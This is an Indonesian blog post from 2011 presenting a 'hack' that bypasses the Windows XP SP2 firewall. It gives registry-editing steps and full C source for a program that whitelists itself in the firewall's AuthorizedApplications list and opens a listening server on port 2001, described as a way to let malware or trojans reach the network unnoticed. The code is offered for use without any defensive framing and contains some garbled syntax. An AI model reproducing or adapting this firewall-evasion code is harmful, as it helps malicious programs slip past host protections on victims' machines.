Senin, 06 Juni 2011

Cara Bypass Firewall Windows XP

Halo teman, saya hari ini akan berbagi dengan Anda menggunakan teknik yang kita bisa bypass windows-xp service pack-2 firewall. Sebuah kerjanya 100% hack dan yang pada dasarnya mengeksploitasi di windows XP.
Teknik ini tidak lain adalah kerentanan yang ditemukan di windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :-
Microsoft Windows XP SP2 dibundel dengan Firewall. Akses langsung ke kunci registri Firewall memungkinkan penyerang lokal untuk memotong daftar Firewall blocking dan memungkinkan program jahat dapat terhubung jaringan.

Vulnerable Systems :-

* Microsoft Windows XP SP2
Firewall Windows XP SP2 memiliki daftar program yang diperbolehkan dalam registri yang tidak benar dilindungi dari modifikasi oleh attacker.If lokal berbahaya penyerang menambahkan sebuah kunci baru ke alamat registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
penyerang dapat mengaktifkan malware-nya atau Trojan dapat terhubung ke Internet tanpa Firewall memicu peringatan.
Proof of Concept :-
Peluncuran program regedit.exe dan mengakses kunci ditemukan di bawah jalan sebagai berikut:
 
 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-

#include <*stdio.h*>
#include <*windows.h*>

#include <*ezsocket.h*>
#include <*conio.h*>
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");

RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;

struct sockaddr_in remote_addr;

fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");

sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello
Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello
Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, "quit"))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */
Hapus ** dari file header ... lebih mudah untuk memahami ... Di sini kita hanya memanipulasi nilai registry menggunakan program ini ...

Tidak ada komentar:

Posting Komentar